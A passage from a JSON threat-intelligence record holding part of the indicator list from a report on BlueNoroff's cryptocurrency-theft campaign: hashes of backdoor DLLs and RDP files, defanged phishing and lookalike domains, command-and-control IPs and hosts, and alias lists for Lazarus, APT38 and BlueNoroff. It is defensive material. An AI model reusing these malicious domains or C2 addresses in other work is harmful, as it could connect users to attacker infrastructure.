lsasvc.dll\r\n56df737f3028203db8d51ed1263160ad    ocss.dll\r\na160b36426ce77bccdd32d117eeb879b    csscv.dll\r\n8fa484d35e60b93a4128dc5de45ec0df    wmmc.dll\r\n5cc93ccc91b2849df55d89b360fbae58\r\n630ba28be4f55ea67225a3760f9e8c1f\r\nPersistence Backdoor #1\r\n2934a7a0dfaf2ebc81b1f089277129c4  Default.rdp\r\n6c97c64052dfdc457b001f84b8657435  Default.rdp\r\nbdc354506d6c018b52cb92a9d91f5f7c  Default.rdp\r\n737478dbd1f66c9edb2d6c149432be26  Default.rdp\r\n5912e271b0da85ae3327d66deabf03ed  Default.rdp\r\nd209c3da192c49cecb5a7b3d0f7154ac  Default.rdp\r\n8d8f3a0d186b275e51589a694e09e884  Default.rdp\r\n7ccf3ddbdb175fcfece9c4423acf07b6\r\n0a9b8ca2988208b876b74641c07f631e  Default.rdp\r\nPersistence Backdoor #2\r\n9b30baa7873d86f985657c3e324ac431  vsat.dll\r\nae79ea7dfa81e95015bef839c2327108  ssdp.dll\r\nca9b98f17b9e24ca3f802c04eb508103\r\n849dd9e09cc2434ee7dbdbf9e1c408b2\r\n804523ecb9f7809fc2377d03b47dba22\r\n
2b7e434e52ff7480ae06ba901f8efbfd\r\n7129020312b85d5b1e760fc57b567d95\r\nea9d8b81c9f85fd142639997187b447e\r\ne80f9d2fa735d7ab3bd9e954c4fcb6d0\r\ne2ddf13340ba79b2635618e5675eea23\r\n00a145e8f67a92b01ce4d85a0ed6bd77\r\n73aed6bcf90f936f3fbcb389a133d7c8\r\nff28ec14ec926b9892c61b9bf154a910\r\n97e5c0fe8089da97665a22975e2c86de\r\nf60d7f620dc925c4e786bcf46856f4c8\r\n4fbff7f0f62b26963b56c0fc23486891\r\n4bb579d59830579be9ead9f74a55001e\r\naafc80ff2afc71b0d5abd6c8d2809e65\r\n9850b24f8d70ad957f328961170e2d40\r\n58495a2083065b36040eea288a9d5e17\r\nf1cfd14b030e6b5d75e777ace530dad9\r\n1fb25f72e4eb26b0df154de28dbff74c\r\n1b1acc7f27717905e7094f338f81db9f\r\n3776d4a24213972b54b9ed3360ac7883\r\nc93f3bb4f7b19f5eb6f736f2659c4dae\r\n9084620e0219c035d60d395be1bf4cae\r\n2e38f37a23d9f00a02098dd302fc14e2\r\nDomains\r\nabiesvc[.]com\r\nabiesvc[.]info\r\nabiesvc.jp[.]net\r\natom.publicvm[.]com\r\natt.gdrvupload[.]xyz\r\nauthenticate.azure-drive[.]com\r\nazureprotect[.]xyz\r\nbackup.163qiye[.]top\r\nbeenos[.]biz\r\nbhomes[.]cc\r\nbitcoinnews.mefound[.]com\r\nbitflyer[.]team\r\nblog.cloudsecure[.]space\r\nbuidihub[.]com\r\nchemistryworld[.]us\r\ncirclecapital[.]us\r\nclient.googleapis[.]online\r\ncloud.azure-service[.]com\r\ncloud.globalbrains[.]co\r\n
cloud.jumpshare[.]vip\r\ncloud.venturelabo[.]co\r\ncloudshare.jumpshare[.]vip\r\ncoin-squad[.]co\r\ncoinbig[.]dev\r\ncoinbigex[.]com\r\ndeepmind[.]fund\r\ndekryptcap[.]digital\r\ndllhost[.]xyz:5600\r\ndoc.venturelabo[.]co\r\ndoc.youbicapital[.]cc\r\ndoconline[.]top\r\ndocs.azureword[.]com\r\ndocs.coinbigex[.]com\r\ndocs.gdriveshare[.]top\r\ndocs.goglesheet[.]com\r\ndocs.securedigitalmarkets[.]co\r\ndocstream[.]online\r\ndocument.antcapital[.]us\r\ndocument.bhomes[.]cc\r\ndocument.fastercapital[.]cc\r\ndocument.kraken-dev[.]com\r\ndocument.lundbergs[.]cc\r\ndocument.skandiafastigheter[.]cc\r\ndocumentprotect[.]live\r\ndocumentprotect[.]pro\r\ndocuments.antcapital[.]us\r\ndocuserver[.]xyz\r\ndomainhost.dynamic-dns[.]net\r\ndownload.azure-safe[.]com\r\ndownload.azure-service[.]com\r\ndownload.gdriveupload[.]site\r\ndrives.googldrive[.]xyz\r\ndrives.googlecloud[.]live\r\ndriveshare.googldrive[.]xyz\r\ndronefund[.]icu\r\ndrw[.]capital\r\neii[.]world\r\netherscan.mrslove[.]com\r\nfaq78.faqserv[.]com\r\nfastdown[.]site\r\nfastercapital[.]cc\r\n
file.venturelabo[.]co\r\nfilestream[.]download\r\nfoundico.mefound[.]com\r\ngalaxydigital[.]cc\r\ngalaxydigital[.]cloud\r\ngoogledrive[.]download\r\ngoogledrive[.]email\r\ngoogledrive[.]online\r\ngoogledrive.publicvm[.]com\r\ngoogleexplore[.]net\r\ngoogleservice[.]icu\r\ngoogleservice[.]xyz\r\ngsheet.gdocsdown[.]com\r\nhiccup[.]shop\r\ninnoenergy[.]info\r\nisosecurity[.]xyz\r\njack710[.]club\r\njumpshare[.]vip\r\nkraken-dev[.]com\r\nledgerservice.itsaol[.]com\r\nlemniscap[.]cc\r\nlundbergs[.]cc\r\nmail.gdriveupload[.]info\r\nmail.gmaildrive[.]site\r\nmail.googleupload[.]info\r\nmclland[.]com\r\nmicrostratgey[.]com\r\nmiss.outletalertsdaily[.]com\r\nmsoffice.qooqle[.]download\r\nnote.onedocshare[.]com\r\nonlinedocpage[.]org\r\npage.googledocpage[.]com\r\nproduct.onlinedoc[.]dev\r\nprotect.antcapital[.]us\r\nprotect.azure-drive[.]com\r\nprotect.venturelabo[.]co\r\nprotectoffice[.]club\r\npvset.itsaol[.]com\r\nqooqle[.]download\r\nqoqle[.]online\r\nregcnlab[.]com\r\nreit[.]live\r\nsecuredigitalmarkets[.]ca\r\nshare.bloomcloud[.]org\r\nshare.devprocloud[.]com\r\nshare.docuserver[.]xyz\r\nshare.stablemarket[.]org\r\nsharedocs[.]xyz\r\nsignverydn.sharebusiness[.]xyz\r\nsinovationventures[.]co\r\nskandiafastigheter[.]cc\r\nslot0.regcnlab[.]com\r\nsvr04.faqserv[.]com\r\ntokenhub.mefound[.]com\r\ntokentrack.mrbasic[.]com\r\ntwosigma.publicvm[.]com\r\nup.digifincx[.]com\r\nupcraft[.]io\r\nupdatepool[.]online\r\nupload.gdrives[.]best\r\nventurelabo[.]co\r\nverify.googleauth[.]pro\r\nword.azureword[.]com\r\nwww.googledocpage[.]com\r\nwww.googlesheetpage[.]org\r\nwww.onlinedocpage[.]org\r\nyoubicapital[.]cc\r\nC2 address used by 
backdoor\r\n118.70.116[.]154:8080\r\n163.25.24[.]44\r\n45.238.25[.]2\r\ndevstar.dnsrd[.]com\r\nfxbet.linkpc[.]net\r\nlservs.linkpc[.]net\r\nmmsreceive.linkpc[.]net\r\nmsservices.hxxps443[.]org\r\nonlineshoping.publicvm[.]com\r\npalconshop.linkpc[.]net\r\npokersonic.publicvm[.]com\r\npress.linkpc[.]net\r\nrubbishshop.linkpc[.]net\r\nrubbishshop.publicvm[.]com\r\nsocins.publicvm[.]com\r\nvpsfree.linkpc[.]net\r\nUpdate: the domain cdn.discordapp.com was removed from the IOCs section because it is used by a legitimate service/application.\r\nSource: https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/"
	],
	"report_names": [
		"105488"
	],
	"threat_actors": [
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-10T02:00:04.7432Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434598,
	"ts_updated_at": 1775826767,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/03059c470bc4fbb0a1e94f1a3e9b995e0b7c0a5f.pdf",
		"text": "https://archive.orkl.eu/03059c470bc4fbb0a1e94f1a3e9b995e0b7c0a5f.txt",
		"img": "https://archive.orkl.eu/03059c470bc4fbb0a1e94f1a3e9b995e0b7c0a5f.jpg"
	}
}